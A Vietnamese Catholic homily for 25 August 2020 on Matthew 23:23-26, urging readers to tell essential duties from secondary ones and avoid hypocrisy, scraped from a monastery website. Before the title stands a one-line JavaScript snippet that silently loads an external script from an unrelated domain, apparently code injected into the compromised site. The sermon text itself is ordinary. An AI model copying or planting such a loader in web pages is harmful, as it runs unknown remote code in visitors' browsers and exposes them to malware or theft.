;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); PHÂN ĐỊNH ĐIỀU CHÍNH, ĐIỀU PHỤ – Xitô PS

PHÂN ĐỊNH ĐIỀU CHÍNH, ĐIỀU PHỤ

Thứ ba 25/08/2020-Thứ 3 tuần XXI TN, Mt 23,23-26

Phân Định Điều Chính- Điều Phụ

Căn bệnh giả hình hay còn gọi là đạo đức giả mà Chúa Giêsu than phiền về các kinh sư và pharisiêu như trong bài Tin mừng hôm nay, là một căn bệnh mà bất cứ ai thuộc thời đại nào cũng có thể nhiễm. Nó lại càng trở nên nguy hiểm khi những người nhiễm nó lại là những người lãnh đạo. Cho nên, để tránh và giảm bớt nguy cơ lây nhiễm căn bệnh này, cần phải biết sống chân thật và phải biết phân định đâu là chính yếu, đâu là tùy phụ, để đưa tới hành động đúng và chân thật.

Nghe những lời Chúa Giêsu nói với các kinh sư và Pharisiêu trong bài Tin Mừng hôm nay:“khốn cho các ngươi, hỡi các kinh sư và Pharisiêu đạo đức giả”, chúng ta cũng cảm thấy nặng tai, huống chi các kinh sư và Pharisiêu! Nhưng thực ra, đó không phải là những lời mạt sát, nguyền rủa…nhưng đúng hơn, đó là những lời than phiền, than trách, đáng tiếc! Theo William Barcly, nhà nghiên cứu và chú giải Kinh Thánh nổi tiếng , thì từ “khốn cho các ngươi”, được dịch ra tiếng Việt cho thích hợp nhất, tương đương nhất là từ “đáng tiếc thay”, thì mới hợp với ngôn ngữ của Chúa Giêsu. Đáng tiếc thay! vì họ là những người lãnh đạo tôn giáo, những người giảng dạy, hướng dẫn đời sống đạo cho dân chúng, nhưng lại mù quáng, không phân định đâu là điều chính yếu, đâu là điều phụ. Những người lãnh đạo, hướng dẫn mà “mù” thì làm sao dẫn đường đúng. Mù mà dắt mù, cả hai sẽ lăn cù xuống hố!

Tại sao Chúa Giêsu gọi những kinh sư và pharisiêu là những người mù, những kẻ đạo đức giả? Vì họ quá chú trọng hình thức, không phân định đâu là chính yếu, đâu là điều phụ. Họ không sống thật với chính mình. Những điều chính yếu trong Lề Luật như công lý, lòng nhân và thành tín thì lại không chú trọng và dạy người ta; trong khi đó, những điều phụ như nộp thuế thập phân 1/10 thuế rau húng, thì là, bạc hà… thì lại chú trọng và lo chu toàn đầy đủ. Họ còn chú trọng đến hình thức bên ngoài như rửa sạch chén đĩa bên ngoài, trong khi bên trong con người họ thì đầy những chuyện cướp bóc, ăn chơi vô độ, gian tà, bất chính, bất tín… Những cái đó là những biểu hiện bên ngoài của thói đạo đức giả, tài khéo che đậy. Cho nên, Chúa Giêsu cảm thấy đáng tiếc cho một giới lãnh đạo Do thái, những người dẫn đường cho dân chúng mà lại mù quáng đến thế! Họ không phân định đâu là điều chính yếu, đâu là điều tùy phụ. Những người dẫn đường mà như thế thì chỉ có dẫn chiên đi tới vực thẳm của hố sâu chết chóc mà thôi.

Căn bệnh giả hình còn tồn tại trong thế kỷ 21 này nữa không? Thưa, nó không những tồn tại, mà còn phát triển và lan tràn khắp mọi nơi mọi chốn, trong Giáo hội, giáo xứ và cả các cộng đoàn thánh hiến. Chúng ta là những người đều có khả năng lây nhiễm, kẻ nặng người nhẹ. Nếu trong đời sống của chúng ta, chỉ chú trọng hình thức bên ngoài, chỉ lo tuân giữ những điều nhỏ nhặt mà không lo chú trọng vào những điều chính yếu thì nguy cơ căn bệnh này sẽ đưa chúng ta trở thành những kẻ đạo đức giả, như lời Chúa Giêsu nói, và sẽ nguy hại cho chính mình và có nguy cơ lây nhiễm cho những người khác. Thí dụ: đối với ơn gọi chúng ta, Thần vụ là chính yếu, quan trọng, trên hết. Nếu chỉ chú trọng vào công việc, mãi mê công việc mà bỏ bê Thần vụ, bỏ đi lễ, đọc kinh…thì cũng rơi vào tình trạng kinh sư và Pharisiêu, mà Chúa Giêsu đã than phiền, khiển trách, đáng tiếc!

 Đối với các kitô hữu, trước tiên phải lo chu toàn bổn phận giữ luật Chúa như đi lễ, lãnh các bí tích, lo bổn phận gia đình trước; sau đó mới lo các việc phụ như tham gia hội đoàn, làm việc từ thiện…chứ không phải suốt ngày đi làm từ thiện hết chỗ này đến chỗ khác, trong khi đó lại bỏ bê việc gia đình mình…

Vậy, qua Lời Chúa hôm nay, chúng ta hãy xem lời khiển trách của Chúa Giêsu đối với các kinh sư và pharisiêu cũng là lời nhắc nhở cho mỗi chúng ta, để chúng ta biết ý thức, phân định điều chính yếu với điều phụ, để chúng ta không rơi vào tình trạng giả hình. Chúa muốn chúng ta sống thật, sống đúng với phận vụ của mình đối với Chúa và đối với tha nhân, luôn biết phân định đâu là điều chính yếu và đâu là điều tùy phụ, để đưa ra hành động đúng.

FM. Đan Minh

You May Also Like

Trả lời

X